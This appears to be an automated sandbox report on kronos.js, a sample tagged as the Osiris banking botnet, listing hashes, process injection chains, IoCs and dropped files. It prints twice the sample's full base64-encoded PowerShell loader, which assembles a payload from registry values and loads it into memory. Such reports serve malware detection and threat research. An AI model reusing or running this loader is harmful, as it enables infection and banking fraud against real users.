osiris | 6bb71d8bf32cceef6a431136e0c965aa905c45c240b40bb20aa6fb6f661300f3

General

Target

kronos.js
Size

2.5MB
MD5

d7445ce4be501700003a79023147e9b9
SHA1

2d80ceba1af9a16ef2b8186c5f46a19e984837f3
SHA256

6bb71d8bf32cceef6a431136e0c965aa905c45c240b40bb20aa6fb6f661300f3
SHA512

61d1c6d20b793b3f47143db918b66f8968cb43b0f5aee20d73ce009e6c2f924336a7f58b10ba631bff164371a9e80787ae3ac50caaa1943b57750b788db3ddc2

Score

10^/10

osiris banker botnet

Malware Config

Signatures

Osiris
banker botnet osiris
Executes dropped EXE 1 IoCs

Processes:

GetX64BTIT.exe

pid process

2200 GetX64BTIT.exe
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

18 api.ipify.org
19 api.ipify.org
Suspicious use of SetThreadContext 1 IoCs

Processes:

powershell.exe

description pid process target process

PID 3016 set thread context of 3820 3016 powershell.exe ImagingDevices.exe

pid	process
2200	GetX64BTIT.exe

flow	ioc
18	api.ipify.org
19	api.ipify.org

description	pid	process	target process
PID 3016 set thread context of 3820	3016	powershell.exe	ImagingDevices.exe

Suspicious behavior: EnumeratesProcesses 7045 IoCs

Processes:

powershell.exeImagingDevices.exe

pid	process
3016	powershell.exe
3016	powershell.exe
3016	powershell.exe
3820	ImagingDevices.exe
3820	ImagingDevices.exe
3820	ImagingDevices.exe
3820	ImagingDevices.exe
3820	ImagingDevices.exe
3820	ImagingDevices.exe
3820	ImagingDevices.exe
3820	ImagingDevices.exe
3820	ImagingDevices.exe
3820	ImagingDevices.exe
3820	ImagingDevices.exe
3820	ImagingDevices.exe
3820	ImagingDevices.exe
3820	ImagingDevices.exe
3820	ImagingDevices.exe
3820	ImagingDevices.exe
3820	ImagingDevices.exe
3820	ImagingDevices.exe
3820	ImagingDevices.exe
3820	ImagingDevices.exe
3820	ImagingDevices.exe
3820	ImagingDevices.exe
3820	ImagingDevices.exe
3820	ImagingDevices.exe
3820	ImagingDevices.exe
3820	ImagingDevices.exe
3820	ImagingDevices.exe
3820	ImagingDevices.exe
3820	ImagingDevices.exe
3820	ImagingDevices.exe
3820	ImagingDevices.exe
3820	ImagingDevices.exe
3820	ImagingDevices.exe
3820	ImagingDevices.exe
3820	ImagingDevices.exe
3820	ImagingDevices.exe
3820	ImagingDevices.exe
3820	ImagingDevices.exe
3820	ImagingDevices.exe
3820	ImagingDevices.exe
3820	ImagingDevices.exe
3820	ImagingDevices.exe
3820	ImagingDevices.exe
3820	ImagingDevices.exe
3820	ImagingDevices.exe
3820	ImagingDevices.exe
3820	ImagingDevices.exe
3820	ImagingDevices.exe
3820	ImagingDevices.exe
3820	ImagingDevices.exe
3820	ImagingDevices.exe
3820	ImagingDevices.exe
3820	ImagingDevices.exe
3820	ImagingDevices.exe
3820	ImagingDevices.exe
3820	ImagingDevices.exe
3820	ImagingDevices.exe
3820	ImagingDevices.exe
3820	ImagingDevices.exe
3820	ImagingDevices.exe
3820	ImagingDevices.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

powershell.exe

description pid process

Token: SeDebugPrivilege 3016 powershell.exe
Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

ImagingDevices.exe

pid process

3820 ImagingDevices.exe

description	pid	process
Token: SeDebugPrivilege	3016	powershell.exe

pid	process
3820	ImagingDevices.exe

Suspicious use of WriteProcessMemory 17 IoCs

Processes:

wscript.execmd.exepowershell.exeImagingDevices.exe

description	pid	process	target process
PID 1740 wrote to memory of 3508	1740	wscript.exe	cmd.exe
PID 1740 wrote to memory of 3508	1740	wscript.exe	cmd.exe
PID 3508 wrote to memory of 3016	3508	cmd.exe	powershell.exe
PID 3508 wrote to memory of 3016	3508	cmd.exe	powershell.exe
PID 3508 wrote to memory of 3016	3508	cmd.exe	powershell.exe
PID 3016 wrote to memory of 3820	3016	powershell.exe	ImagingDevices.exe
PID 3016 wrote to memory of 3820	3016	powershell.exe	ImagingDevices.exe
PID 3016 wrote to memory of 3820	3016	powershell.exe	ImagingDevices.exe
PID 3016 wrote to memory of 3820	3016	powershell.exe	ImagingDevices.exe
PID 3016 wrote to memory of 3820	3016	powershell.exe	ImagingDevices.exe
PID 3016 wrote to memory of 3820	3016	powershell.exe	ImagingDevices.exe
PID 3016 wrote to memory of 3820	3016	powershell.exe	ImagingDevices.exe
PID 3016 wrote to memory of 3820	3016	powershell.exe	ImagingDevices.exe
PID 3016 wrote to memory of 3820	3016	powershell.exe	ImagingDevices.exe
PID 3016 wrote to memory of 3820	3016	powershell.exe	ImagingDevices.exe
PID 3820 wrote to memory of 2200	3820	ImagingDevices.exe	GetX64BTIT.exe
PID 3820 wrote to memory of 2200	3820	ImagingDevices.exe	GetX64BTIT.exe

C:\Windows\system32\wscript.exe
wscript.exe C:\Users\Admin\AppData\Local\Temp\kronos.js
1⤵
- Suspicious use of WriteProcessMemory
PID:1740

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -En "PAAjACAAdQB2AHgAdgByAGwAIAAjAD4AJAB1AD0AJABlAG4AdgA6AFUAcwBlAHIATgBhAG0AZQA7AGYAbwByACAAKAAkAGkAPQAwADsAJABpACAALQBsAGUAIAA3ADAAMAA7ACQAaQArACsAKQB7ACQAYwA9ACIASABLAEMAVQA6AFwAUwBPAEYAVABXAEEAUgBFAFwAIgArACQAdQArACIAMQAiADsAVAByAHkAewAkAGEAPQAkAGEAKwAoAEcAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAHAAYQB0AGgAIAAkAGMAKQAuACQAaQB9AEMAYQB0AGMAaAB7AH0AfQA7AGYAdQBuAGMAdABpAG8AbgAgAGMAaABiAGEAewBbAGMAbQBkAGwAZQB0AGIAaQBuAGQAaQBuAGcAKAApAF0AcABhAHIAYQBtACgAWwBwAGEAcgBhAG0AZQB0AGUAcgAoAE0AYQBuAGQAYQB0AG8AcgB5AD0AJAB0AHIAdQBlACkAXQBbAFMAdAByAGkAbgBnAF0AJABoAHMAKQA7ACQAQgB5AHQAZQBzACAAPQAgAFsAYgB5AHQAZQBbAF0AXQA6ADoAbgBlAHcAKAAkAGgAcwAuAEwAZQBuAGcAdABoACAALwAgADIAKQA7AGYAbwByACgAJABpAD0AMAA7ACAAJABpACAALQBsAHQAIAAkAGgAcwAuAEwAZQBuAGcAdABoADsAIAAkAGkAKwA9ADIAKQB7ACQAQgB5AHQAZQBzAFsAJABpAC8AMgBdACAAPQAgAFsAYwBvAG4AdgBlAHIAdABdADoAOgBUAG8AQgB5AHQAZQAoACQAaABzAC4AUwB1AGIAcwB0AHIAaQBuAGcAKAAkAGkALAAgADIAKQAsACAAMQA2ACkAfQAkAEIAeQB0AGUAcwB9ADsAJABpACAAPQAgADAAOwBXAGgAaQBsAGUAIAAoACQAVAByAHUAZQApAHsAJABpACsAKwA7ACQAawBvACAAPQAgAFsAbQBhAHQAaABdADoAOgBTAHEAcgB0ACgAJABpACkAOwBpAGYAIAAoACQAawBvACAALQBlAHEAIAAxADAAMAAwACkAewAgAGIAcgBlAGEAawB9AH0AWwBiAHkAdABlAFsAXQBdACQAYgAgAD0AIABjAGgAYgBhACgAJABhAC4AcgBlAHAAbABhAGMAZQAoACIAIwAiACwAJABrAG8AKQApADsAWwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKAAkAGIAKQA7AFsATQBvAGQAZQBdADoAOgBTAGUAdAB1AHAAKAApADsA "
2⤵
- Suspicious use of WriteProcessMemory
PID:3508

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -En "PAAjACAAdQB2AHgAdgByAGwAIAAjAD4AJAB1AD0AJABlAG4AdgA6AFUAcwBlAHIATgBhAG0AZQA7AGYAbwByACAAKAAkAGkAPQAwADsAJABpACAALQBsAGUAIAA3ADAAMAA7ACQAaQArACsAKQB7ACQAYwA9ACIASABLAEMAVQA6AFwAUwBPAEYAVABXAEEAUgBFAFwAIgArACQAdQArACIAMQAiADsAVAByAHkAewAkAGEAPQAkAGEAKwAoAEcAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAHAAYQB0AGgAIAAkAGMAKQAuACQAaQB9AEMAYQB0AGMAaAB7AH0AfQA7AGYAdQBuAGMAdABpAG8AbgAgAGMAaABiAGEAewBbAGMAbQBkAGwAZQB0AGIAaQBuAGQAaQBuAGcAKAApAF0AcABhAHIAYQBtACgAWwBwAGEAcgBhAG0AZQB0AGUAcgAoAE0AYQBuAGQAYQB0AG8AcgB5AD0AJAB0AHIAdQBlACkAXQBbAFMAdAByAGkAbgBnAF0AJABoAHMAKQA7ACQAQgB5AHQAZQBzACAAPQAgAFsAYgB5AHQAZQBbAF0AXQA6ADoAbgBlAHcAKAAkAGgAcwAuAEwAZQBuAGcAdABoACAALwAgADIAKQA7AGYAbwByACgAJABpAD0AMAA7ACAAJABpACAALQBsAHQAIAAkAGgAcwAuAEwAZQBuAGcAdABoADsAIAAkAGkAKwA9ADIAKQB7ACQAQgB5AHQAZQBzAFsAJABpAC8AMgBdACAAPQAgAFsAYwBvAG4AdgBlAHIAdABdADoAOgBUAG8AQgB5AHQAZQAoACQAaABzAC4AUwB1AGIAcwB0AHIAaQBuAGcAKAAkAGkALAAgADIAKQAsACAAMQA2ACkAfQAkAEIAeQB0AGUAcwB9ADsAJABpACAAPQAgADAAOwBXAGgAaQBsAGUAIAAoACQAVAByAHUAZQApAHsAJABpACsAKwA7ACQAawBvACAAPQAgAFsAbQBhAHQAaABdADoAOgBTAHEAcgB0ACgAJABpACkAOwBpAGYAIAAoACQAawBvACAALQBlAHEAIAAxADAAMAAwACkAewAgAGIAcgBlAGEAawB9AH0AWwBiAHkAdABlAFsAXQBdACQAYgAgAD0AIABjAGgAYgBhACgAJABhAC4AcgBlAHAAbABhAGMAZQAoACIAIwAiACwAJABrAG8AKQApADsAWwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKAAkAGIAKQA7AFsATQBvAGQAZQBdADoAOgBTAGUAdAB1AHAAKAApADsA "
3⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3016

C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe
"C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe"
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3820

C:\Users\Admin\AppData\Local\Temp\GetX64BTIT.exe
"C:\Users\Admin\AppData\Local\Temp\GetX64BTIT.exe"
5⤵
- Executes dropped EXE
PID:2200

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\GetX64BTIT.exe

MD5
b4cd27f2b37665f51eb9fe685ec1d373

SHA1
7f08febf0fdb7fc9f8bf35a10fb11e7de431abe0

SHA256
91f1023142b7babf6ff75dad984c2a35bde61dc9e61f45483f4b65008576d581

SHA512
e025f65224d78f5fd0abebe281ac0d44a385b2641e367cf39eed6aefada20a112ac47f94d7febc4424f1db6a6947bac16ff83ef93a8d745b3cddfdbe64c49a1e

Download Submit
C:\Users\Admin\AppData\Local\Temp\GetX64BTIT.exe

MD5
b4cd27f2b37665f51eb9fe685ec1d373

SHA1
7f08febf0fdb7fc9f8bf35a10fb11e7de431abe0

SHA256
91f1023142b7babf6ff75dad984c2a35bde61dc9e61f45483f4b65008576d581

SHA512
e025f65224d78f5fd0abebe281ac0d44a385b2641e367cf39eed6aefada20a112ac47f94d7febc4424f1db6a6947bac16ff83ef93a8d745b3cddfdbe64c49a1e

Download Submit
C:\Users\Admin\AppData\Local\Temp\x64btit.txt

MD5
75ecdeebb2335db1f411ebfb8ca55d66

SHA1
97f4a3d62fd631674243b6b945289a6b936e7539

SHA256
608ec93dcdc0f67c7952a68b9ed35095fad98173e4510825c5cc5714588beafa

SHA512
7343164cb6cee66fa75c8677192d84e200d436176eca4a0d92fc323b89e051d650525b17f821a938e5c723a7ea4d4d0c56a1d37ba8b441df2799512e0cb5aa21

Download Submit
memory/2200-24-0x0000000000000000-mapping.dmp

Download
memory/3016-15-0x0000000008C80000-0x0000000008C81000-memory.dmp

Filesize
4KB

Download
memory/3016-18-0x0000000009220000-0x0000000009221000-memory.dmp

Filesize
4KB

Download
memory/3016-9-0x0000000006C30000-0x0000000006C31000-memory.dmp

Filesize
4KB

Download
memory/3016-10-0x0000000006CA0000-0x0000000006CA1000-memory.dmp

Filesize
4KB

Download
memory/3016-11-0x00000000075F0000-0x00000000075F1000-memory.dmp

Filesize
4KB

Download
memory/3016-12-0x0000000006D70000-0x0000000006D71000-memory.dmp

Filesize
4KB

Download
memory/3016-13-0x0000000007B20000-0x0000000007B21000-memory.dmp

Filesize
4KB

Download
memory/3016-14-0x0000000007CC0000-0x0000000007CC1000-memory.dmp

Filesize
4KB

Download
memory/3016-4-0x0000000000000000-mapping.dmp

Download
memory/3016-16-0x00000000089A0000-0x00000000089A1000-memory.dmp

Filesize
4KB

Download
memory/3016-17-0x0000000008C10000-0x0000000008C11000-memory.dmp

Filesize
4KB

Download
memory/3016-8-0x0000000006A90000-0x0000000006A91000-memory.dmp

Filesize
4KB

Download
memory/3016-19-0x0000000008D20000-0x0000000008D22000-memory.dmp

Filesize
8KB

Download
memory/3016-20-0x0000000008E90000-0x0000000008FDC000-memory.dmp

Filesize
1.3MB

Download
memory/3016-5-0x0000000073960000-0x000000007404E000-memory.dmp

Filesize
6.9MB

Download
memory/3016-6-0x00000000040E0000-0x00000000040E1000-memory.dmp

Filesize
4KB

Download
memory/3016-7-0x0000000006EA0000-0x0000000006EA1000-memory.dmp

Filesize
4KB

Download
memory/3508-3-0x0000000000000000-mapping.dmp

Download
memory/3820-23-0x0000000000400000-0x0000000000456000-memory.dmp

Filesize
344KB

Download
memory/3820-22-0x0000000000401698-mapping.dmp

Download
memory/3820-21-0x0000000000400000-0x0000000000456000-memory.dmp

Filesize
344KB

Download

Analysis

Sharing